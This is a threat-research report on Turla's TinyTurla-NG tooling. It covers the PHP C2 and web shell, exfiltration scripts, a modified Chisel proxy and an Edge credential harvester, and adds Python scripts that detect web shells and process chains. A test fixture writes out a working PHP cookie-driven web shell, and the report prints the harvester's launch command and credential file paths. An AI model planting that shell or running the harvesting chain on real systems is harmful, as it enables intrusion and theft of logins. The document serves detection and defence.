Cisco Talos, in cooperation with CERT.NGO, has discovered new malicious components used by the Turla APT. New findings from Talos illustrate the inner workings of the command and control (C2) scripts deployed on the compromised WordPress servers utilized in the compromise we previously disclosed.
- Talos also illustrates the post-compromise activity carried out by the operators of the TinyTurla-NG (TTNG) backdoor to issue commands to the infected endpoints. We found three distinct sets of PowerShell commands issued to TTNG to enumerate, stage and exfiltrate files that the attackers found to be of interest.
- Talos has also discovered the use of another three malicious modules deployed via the initial implant, TinyTurla-NG, to maintain access and carry out arbitrary command execution and credential harvesting.
- One of these components is a modified agent/client from Chisel, an open-sourced attack framework, used to communicate with a separate C2 server to execute arbitrary commands on the infected systems.
- Certificate analysis of the Chisel client used in this campaign indicates that another modified Chisel implant has likely been created that uses a similar yet distinct certificate. This assessment is in line with Turla’s usage of multiple variants of malware families, including TinyTurla-NG, TurlaPower-NG and other PowerShell-based scripts, during this campaign.
Talos, in cooperation with CERT.NGO, has discovered new malicious components used by the Turla APT in the compromise we’ve previously disclosed. The continued investigation also revealed details of the inner workings of the C2 scripts including handling of incoming requests and a WebShell component that allows the operators to administer the compromised C2 servers remotely.
C2 server analysis
The command and control (C2) code is a PHP-based script that serves two purposes: It’s a handler for the TinyTurla-NG implants and web shell that the Turla operators can use to execute commands on the compromised C2 server. The C2 scripts obtained by Talos are complementary to the TinyTurla-NG (TTNG) and TurlaPower-NG implants and are meant to deliver executables and administrative commands to execute on infected systems.
On load, the PHP-based C2 script performs multiple actions to create the file structure used to serve the TTNG backdoor. After receiving a request, the C2 script first checks whether the logging directory exists and creates it if it does not. Next, the script checks for a specific COOKIE ID. If it exists and corresponds to the hardcoded value, the C2 script acts as a web shell.
It will base64 decode the value of the $_COOKIE (not to be confused with the authentication COOKIE ID) entry and execute it on the C2 server as a command. These commands are either run using the exec(), passthru(), system(), or shell_exec() functions. It will also check if the variable specified is a resource and read its contents. Once the actions are complete, the output or resource is sent to the requestor and the PHP script will stop executing.
If there is an “id” provided in the HTTP request to the C2 server, the script will treat this as communication with an implant, such as TTNG or TurlaPower-NG. The “id” parameter is the same variable that is passed by the TTNG and TurlaPower-NG implants during communication with the C2 and creates the logging directory on the C2 server, as well. Depending on the next form value accompanying the “id”, the C2 will perform the following actions:
- “task”: Write the content sent by the requestor to the “<id>/tasks.txt” file and record the requestor’s IP address and timestamp in the “<id>/_log.txt”. The contents of this file are then sent to the requestor in response to the “gettask” request. Adversaries use this mechanism to add more tasks to the list of tasks/commands that each C2 must send to their backdoor installations to execute on the infected endpoints.
- “gettask”: Send the contents of the “<id>/tasks.txt” file to the infected system requesting a new command to execute on the infected endpoint.
- “result”: Get the content of the HTTP(S) form and record it into the “<id>/result.txt” file. The C2 uses this mechanism to obtain and record the output of a command executed on an infected endpoint by the TTNG backdoor into a file on disk.
- “getresult”: Get the contents of the “<id>/result.txt” file from the C2 server. The adversaries use this to obtain the results of a command executed on the infected endpoint without having to access the C2 server.
- “file” + “name”: Save the contents of the file sent to the C2 server, either in full or in part, to a file on the C2 server with the same “name” specified in the HTTP form.
- “cat_file”: Read the contents of a file specified by the requestor on the C2 server and respond with the contents.
- “rm_file”: Remove/delete a file specified by the requestor from the C2 server.
The HTTP form values accepted by the C2 server (task, cat_file, rm_file, getresult) and their corresponding operations on the C2 server indicate that these are part of an operational apparatus that allows the threat actors to feed the C2 server new commands and retrieve valuable information collected by the C2 server from a remote location, without having to log into the C2 itself. Operationally, this tactic benefits the threat actors because all C2 servers discovered so far are websites compromised by the threat actor rather than attacker-owned infrastructure. It is therefore preferable for Turla’s operators to simply communicate over HTTPS, masquerading as legitimate traffic, instead of re-exploiting the servers or accessing them through other means such as SSH, which would increase their footprint on the compromised C2 servers.
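The server-side traces described above can be checked for directly on a suspect web server. The following triage script is an added example, not Talos' code or part of the original post: it walks a webroot for the per-implant directory layout (tasks.txt, result.txt, _log.txt) and for a PHP file that base64-decodes a $_COOKIE value and feeds it to exec()/passthru()/system()/shell_exec(). The fixture paths, the "implant-id-placeholder" directory name and the PHP snippets are constructed assumptions.

```python
"""Server-side triage for a site suspected of hosting the TinyTurla-NG C2 script: finds the
per-implant "<id>/" directory and PHP files that base64-decode a $_COOKIE value and run it."""
import os
import re
import tempfile
from pathlib import Path

# Files the C2 script keeps per implant id (names from the write-up).
TTNG_ARTIFACTS = {"tasks.txt", "result.txt", "_log.txt"}
# Web shell trace: a $_COOKIE value is base64-decoded and an exec-family function is called.
COOKIE_DECODE = re.compile(r"base64_decode\s*\(\s*\$_COOKIE\b", re.IGNORECASE)
EXEC_CALL = re.compile(r"\b(exec|passthru|system|shell_exec)\s*\(", re.IGNORECASE)

def find_ttng_dirs(root, min_hits=2):
    """Return (directory, artifacts found) for dirs holding >= min_hits artifact files."""
    hits = []
    for dirpath, _, filenames in os.walk(root):
        present = TTNG_ARTIFACTS.intersection(filenames)
        if len(present) >= min_hits:
            hits.append((dirpath, sorted(present)))
    return sorted(hits)

def find_cookie_shells(root):
    """Return PHP files that decode a cookie AND call a command-execution function."""
    hits = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if not name.lower().endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "r", errors="ignore") as fh:
                src = fh.read()
            if COOKIE_DECODE.search(src) and EXEC_CALL.search(src):
                hits.append(path)
    return sorted(hits)

def build_fixture(root=None):
    """Create a constructed webroot (not a real sample): one C2 dir, one shell, one benign file."""
    root = Path(root or tempfile.mkdtemp())
    c2dir = root / "wp-content" / "uploads" / "implant-id-placeholder"  # assumed "<id>" name
    c2dir.mkdir(parents=True)
    for name in TTNG_ARTIFACTS:
        (c2dir / name).write_text("constructed\n")
    shell = root / "wp-includes" / "cache.php"
    shell.parent.mkdir()
    shell.write_text('<?php $c = base64_decode($_COOKIE["k"]); passthru($c); ?>\n')
    # Decodes a cookie but never executes it: must not be reported.
    (root / "index.php").write_text('<?php echo base64_decode($_COOKIE["t"]); ?>\n')
    return str(root), str(c2dir), str(shell)

if __name__ == "__main__":
    webroot, _, _ = build_fixture()
    print(find_ttng_dirs(webroot))
    print(find_cookie_shells(webroot))
```

Point `find_ttng_dirs` and `find_cookie_shells` at a real document root instead of the fixture; hits on both checks in the same site are a strong signal, a single cookie-decode match alone is not.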
This tactic can be visualized as:
Instrumenting TinyTurla-NG to carry out post-compromise activity
The adversaries use TinyTurla-NG to perform additional reconnaissance to enumerate files of interest on the infected endpoints and then exfiltrate these files. They issued three distinct sets of modular PowerShell commands to TTNG:
- Reconnaissance commands: Used to enumerate files in a directory specified by the operator. The directory listing is returned to the operator to select interesting files that can be exfiltrated.
PowerShell script/Command enumerates files in four locations specified by the C2 and sends the results back to it.
- Copy file commands: Base64-encoded commands/scripts issued to the infected systems to copy over files of interest from their original location to a temporary directory, usually: C:\windows\temp\
- Exfiltration commands/scripts aka TurlaPower-NG: These scripts were used to finally exfiltrate the selected files to the C2 servers.
The scripts used during enumeration, copying and exfiltration tasks contain hardcoded paths for files and folders of interest to Turla. These locations consisted of files and documents that were used and maintained by Polish NGOs to conduct their day-to-day operations. The actors also used these scripts to exfiltrate Firefox profile data, reinforcing our assessment that Turla made attempts to harvest credentials, along with data exfiltration.
While TinyTurla-NG itself is enough to perform a variety of unauthorized actions on the infected system using a combination of the scripts described above, the attackers chose to deploy three more tools to aid in their malicious operations:
- Chisel: Modified copy of the Chisel client/agent.
- Credential harvesting scripts: PowerShell-based scripts for harvesting Google Chrome or Microsoft Edge’s saved login data.
- Tool for executing commands with elevated privileges: A binary that is meant to impersonate the privilege level of a specified process while executing arbitrary commands specified by the parent process.
The overall infection activity once TTNG has been deployed looks like this:
Using Chisel as another means of persistent access
Talos’ investigation uncovered that apart from TurlaPower-NG, the PowerShell-based file exfiltrator, the adversary also deployed another implant on infected systems. It’s a modified copy of the GoLang-based, open-source tunneling tool Chisel stored in the location: C:\Windows\System32\TrustedWorker[.]exe
The modified Chisel malware is UPX compressed, as is common for Go binaries, and contains the C2 URL, port and communication certificate, and private keys embedded in the malware sample. Once it decrypts these artifacts, it continues to create a reverse SOCKS proxy connection to the C2 using the configuration: R:5000:socks
In the proxy configuration:
- “R”: Stands for remote port forwarding.
- “5000”: This is the port on the attacker machine that receives the connection from the infected system.
- “socks”: Specifies the usage of the SOCKS protocol.
(The default local host and port for a socks remote in Chisel is 127[.]0[.]0[.]1:1080.)
The C2 server that the Chisel sample contacts is: 91[.]193[.]18[.]120:443.
The TLS configuration consists of a client TLS certificate and key pair. The certificate is valid between Dec. 7, 2023 and Dec. 16, 2024. This validity falls in line with Talos’ assessment that the campaign began in December 2023. The issuer of the certificate is named “dropher[.]com” and the subject name is “blum[.]com”.
During our data analysis, we found another certificate which we assessed with high confidence was also generated by Turla operators, but it’s unclear whether this was a mistake or whether they intended the certificate to be used on another modified Chisel implant.
The new certificate has the same issuer but in this case, the common name is blum[.]com and the serial number is 0x1000. This certificate was generated one second before the one used in the modified chisel client/agent.
Additional tools for elevated process execution and credential harvesting
Turla also deployed two more tools to aid their malicious operations on the infected systems. One is used to run arbitrary commands on the system and the other is used to steal Microsoft Edge browser’s login data.
The first tool is a small and simple Windows executable to create a new command line process on the system by impersonating the privilege level of another existing process. The tool will accept a target Process Identifier (PID) representing the process whose privilege level is to be impersonated and the command line that needs to be executed. Then, a new cmd[.]exe is spawned and used to execute arbitrary commands on the infected endpoint. The binary was compiled in early 2022 and was likely used in previous campaigns by Turla.
The second tool discovered by Talos is a PowerShell script residing at the location:
C:\windows\system32\edgeparser.ps1
This script is used to find login data from Microsoft Edge located at:
%userprofile%\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
This data file and the corresponding decryption key for the login data extracted from the endpoint is archived into a ZIP file and stored in the directory: C:\windows\temp\<filename>.zip
The script can be used to obtain credentials for Google Chrome as well but has been modified to parse login data from:
%userprofile%\AppData\Local\Microsoft\Edge
TTNG uses the privilege elevation tool to run the PowerShell script using the command:
"C:\Windows\System32\i.exe" _PID_ "powershell -f C:\Windows\System32\edgeparser.ps1"
This results in the tool spawning a new process with the command line:
C:\Windows\System32\cmd.exe /c "powershell -f C:\Windows\System32\edgeparser.ps1"
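The launch chain above (a tool handed a PID and a quoted command line, which then spawns cmd.exe /c "powershell -f <script>.ps1") is what an endpoint detection should key on rather than the fixed file name i.exe. The following is an added example, not Talos' code or part of the original post, expressing that chain as detection logic over process-creation records; the Sysmon-style field names, the constructed events and the PID value 4412 are assumptions.

```python
"""Process-creation detection for the elevated-execution chain above: a parent given a PID
plus a quoted command line that spawns cmd.exe /c "powershell -f <script>.ps1" (Sysmon-like fields)."""
import re

# Parent launched as: "<tool>.exe" <pid> "<command line>" (shape from the write-up).
IMPERSONATE_LAUNCH = re.compile(r'^"?[^"]*\.exe"?\s+(\d+)\s+"(.+)"\s*$', re.IGNORECASE)
# Child: cmd.exe /c "powershell -f <script>.ps1"
CMD_POWERSHELL = re.compile(r'cmd\.exe"?\s+/c\s+"?powershell(?:\.exe)?\s+-f\s+(\S+\.ps1)', re.IGNORECASE)
# Scripts staged under the Windows directory, as edgeparser.ps1 was.
WINDOWS_DIR = re.compile(r'^[a-z]:\\windows\\', re.IGNORECASE)

def classify(event):
    """Return the list of indicators an event trips (empty if none)."""
    reasons = []
    parent = event.get("ParentCommandLine", "")
    child = event.get("CommandLine", "")
    m_child = CMD_POWERSHELL.search(child)
    if m_child:
        reasons.append("cmd.exe wrapping 'powershell -f'")
        if WINDOWS_DIR.match(m_child.group(1)):
            reasons.append("script staged under C:\\Windows: " + m_child.group(1))
    m_parent = IMPERSONATE_LAUNCH.match(parent)
    if m_parent and m_child and m_parent.group(2).lower() in child.lower():
        reasons.append("parent took a PID and forwarded its quoted command line")
    return reasons

def scan(events, threshold=2):
    """Map event index -> reasons for events tripping at least `threshold` indicators."""
    flagged = {}
    for i, event in enumerate(events):
        reasons = classify(event)
        if len(reasons) >= threshold:
            flagged[i] = reasons
    return flagged

# Constructed sample events (not real telemetry); the PID 4412 is made up.
SAMPLE_EVENTS = [
    {  # the chain described in the write-up
        "Image": r"C:\Windows\System32\cmd.exe",
        "CommandLine": r'C:\Windows\System32\cmd.exe /c "powershell -f C:\Windows\System32\edgeparser.ps1"',
        "ParentImage": r"C:\Windows\System32\i.exe",
        "ParentCommandLine": r'"C:\Windows\System32\i.exe" 4412 "powershell -f C:\Windows\System32\edgeparser.ps1"',
    },
    {  # benign-looking: a scheduled task running an admin script from a user path
        "Image": r"C:\Windows\System32\cmd.exe",
        "CommandLine": r'cmd.exe /c "powershell -f C:\Users\admin\scripts\backup.ps1"',
        "ParentImage": r"C:\Windows\System32\svchost.exe",
        "ParentCommandLine": r"C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule",
    },
]

if __name__ == "__main__":
    for idx, why in scan(SAMPLE_EVENTS).items():
        print(idx, why)
```

Only the first event reaches the threshold: the benign scheduled task trips the weak cmd.exe/powershell indicator alone, which is why the rule requires two.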
Coverage
Ways our customers can detect and block this threat are listed below.
Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.
Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.
Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.
Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.
Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.
Umbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.
Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.
Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.
Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.
Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.
IOCs
IOCs for this research can also be found in our GitHub repository here.
IP Addresses
91[.]193[.]18[.]120
Originally published by Asheer Malhotra, Holger Unterbrink, Vitor Ventura and Arnaud Zobec: TinyTurla-NG in-depth tooling and command and control analysis